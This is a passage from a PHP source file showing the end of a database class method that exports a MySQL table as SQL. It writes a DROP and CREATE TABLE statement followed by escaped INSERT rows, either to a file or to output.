1523		$search = array("\x00", "\x0a", "\x0d", "\x1a"); //\x08\\x09, not required
1524		$replace = array('\0', '\n', '\r', '\Z');
1525
1526		if (isset($this->charset) && isset($this->charsetdb[$this->charset])) {
1527			$set_names = $this->charsetdb[$this->charset];
1528		} else {
1529			$set_names = $this->charsetdb['utf-8'];
1530		}
1531		$tabledump = 'SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";'.$crlf.$crlf;
1532		$tabledump .= '/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;'.$crlf
1533			   . '/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;'.$crlf
1534			   . '/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;'.$crlf
1535			   . '/*!40101 SET NAMES ' . $set_names . ' */;'.$crlf.$crlf;
1536
1537		$tabledump .= "DROP TABLE IF EXISTS `$table`;".$crlf;
1538		$res = $this->query("SHOW CREATE TABLE $table");
1539		$create = $this->fetch($res, MYSQL_NUM);
1540		$tabledump .= $create[1].';'.$crlf.$crlf;
1541		if (strpos($tabledump, "(\r\n ")) {
1542			$tabledump = str_replace("\r\n", $crlf, $tabledump);
1543		} elseif (strpos($tabledump, "(\n ")) {
1544			$tabledump = str_replace("\n", $crlf, $tabledump);
1545		} elseif (strpos($tabledump, "(\r ")) {
1546			$tabledump = str_replace("\r", $crlf, $tabledump);
1547		}
1548		unset($create);
1549
1550		if ($fp) {
1551			fwrite($fp,$tabledump);
1552		} else {
1553			echo $tabledump;
1554		}
1555		$tabledump = '';
1556		$rows = $this->query("SELECT * FROM $table");
1557		$fields_cnt = $this->num_fields($rows);
1558		$fields_meta = $this->get_fields_meta($rows);
1559
1560		while ($row = $this->fetch($rows, MYSQL_NUM)) {
1561			for ($j = 0; $j < $fields_cnt; $j++) {
1562				if (!isset($row[$j]) || is_null($row[$j])) {
1563					$values[] = 'NULL';
1564				} elseif ($fields_meta[$j]->numeric && $fields_meta[$j]->type != 'timestamp' && !$fields_meta[$j]->blob) {
1565					$values[] = $row[$j];
1566				} elseif ($fields_meta[$j]->blob) {
1567					if (empty($row[$j]) && $row[$j] != '0') {
1568						$values[] = '\'\'';
1569					} else {
1570						$values[] = '0x'.bin2hex($row[$j]);
1571					}
1572				} else {
1573					$values[] = '\''.str_replace($search, $replace, $this->sqlAddSlashes($row[$j])).'\'';
1574				}
1575			}
1576			$tabledump = 'INSERT INTO `'.$table.'` VALUES('.implode(', ', $values).');'.$crlf;
1577			unset($values);
1578			if ($fp) {
1579				fwrite($fp,$tabledump);
1580			} else {
1581				echo $tabledump;
1582			}
1583		}
1584		$this->free_result($rows);
1585	}
1586}
1587?>